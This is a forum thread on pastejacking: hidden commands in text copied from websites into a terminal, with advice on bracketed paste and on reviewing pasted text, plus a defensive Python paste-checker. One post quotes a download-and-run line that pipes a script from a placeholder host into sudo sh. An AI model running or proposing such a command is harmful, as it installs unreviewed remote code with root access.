Never directly paste commands into CLI from websites

As a recent blog post showed in a simple manner: Let me remind you to either paste any CLI commands you copy from a website into an editor or install some sort of checker. Otherwise you might get your Unix system easily infected with malware or other shenanigans.

I myself am now using bracketed paste in my ZSH, which I highly recommend.
Reddit users also suggest other solutions.

Keep your systems safe, boys and girls! :)

16 Likes

yep.

Also, any system that auto-runs commands as soon as you paste them is not a system I want to use.
Auto-run on paste is a POS feature which my Mac has.

1 Like

Stupid question... why? I normally type them and use autocomplete if possible, so I never copy and paste. At least I can't remember the last time I did.

1 Like

Thanks man! nice share.

Depends of course a bit on what kind of distro you use as well.
I mean Ubuntu-based distributions that sometimes need PPAs to install certain software.
You should indeed always double-check the source of the PPA link first.

This of course aside from commands, which you should always check before use.

A simple right click and inspecting elements on a webpage can save you a lot of headache.

2 Likes

You can directly copy if you simply use shift and right arrow from the beginning. The code is hidden after the space, so it's like this: "ls (HIDDEN TEXT)-lat". If you simply put the cursor at the beginning next to LS and then shift over, you can see that there is more than what is displayed.

Well, sometimes it's just easier to copy something by marking it and pasting it with middle mouse button, for example when downloading a file via http-link. But with default terminal settings, you can engineer a text to contain hidden commands (if you haven't, try the ls -lat command from the website), so I prefer installing an addon than typing 50 character http links ;).

That's one way. I prefer using multibracket paste, so I can review what I'm pasting ;).

I prefer to paste into a text editor then sanity check before running. Malware is less of a risk than "stupidware". Make sure commands aren't going to cause irreparable damage before running!

These are the magical words.
If the user is 'a typical user', it's no trick to, for example, have them click on the wrong thing once and suddenly their keystrokes and all files are transferred over the network, without escalating privileges, without the user knowing.
Imagine if that happened in a corporation.

2 Likes

Particularly if the command includes something along the lines of wget -O - http://[someunknownwebsite]/install.sh | sudo sh. Before you know it you've created a reverse tunnel back door, added a user, given it full sudo and notified someone at the other end there's a server available for them to play with. You could actually have no visual feedback of what's gone on, and the last task could well be to write some innocent-looking code to the "install.sh".
1. Download code using a non privileged user and preferably not to the server it's going to be run from.
2. View the code and manually download any other packages it's downloading
3. Read it a couple of times through to be certain it's not doing anything untoward
4. Edit the code to ensure that paths/users/IP addys etc are relevant and correct
5. DON'T RUN IT ON A PRODUCTION SERVER WITHOUT HAVING RUN IT SOMEWHERE ELSE AND PEER REVIEWED

thanks for the tip op
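
Added example, not part of any post in this thread: a small checker for the "paste into an editor and look first" advice above. It makes hidden characters in copied text visible and flags the ones that matter at a shell prompt. The function names and the sample string are constructed for illustration; the sample mimics the "ls (HIDDEN TEXT)-lat" case with a harmless echo.

```python
import sys
import unicodedata

# End marker of bracketed paste. If it survives inside pasted data, the text
# after it is no longer treated as a paste by the shell.
PASTE_END = "\x1b[201~"

# Constructed sample: renders as "ls -lat" on a page, but the copied text
# carries an extra line (harmless echo used as a stand-in).
SAMPLE = "ls \necho HIDDEN\n-lat"


def audit_paste(text):
    """Return (offset, reason) findings for text about to be pasted."""
    findings = []
    if PASTE_END in text:
        findings.append((text.index(PASTE_END), "bracketed-paste end sequence"))
    for i, ch in enumerate(text):
        cat = unicodedata.category(ch)
        if ch in "\r\n":
            findings.append((i, "line break: executes on paste if the shell does not bracket pastes"))
        elif cat == "Cc" and ch != "\t":
            findings.append((i, f"control character U+{ord(ch):04X}"))
        elif cat == "Cf":
            findings.append((i, f"invisible format character U+{ord(ch):04X}"))
    return findings


def visible(text):
    """Render text with every non-printable character spelled out."""
    return "".join(ch if ch.isprintable() else f"<U+{ord(ch):04X}>" for ch in text)


if __name__ == "__main__":
    # Usage: pipe the clipboard in, or run with no input to audit SAMPLE.
    data = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    print(visible(data))
    for offset, reason in audit_paste(data):
        print(f"  offset {offset}: {reason}")
    sys.exit(1 if audit_paste(data) else 0)
```

A clean single-line command produces no findings and exit status 0; anything flagged is worth reading in the rendered form before it goes near a prompt.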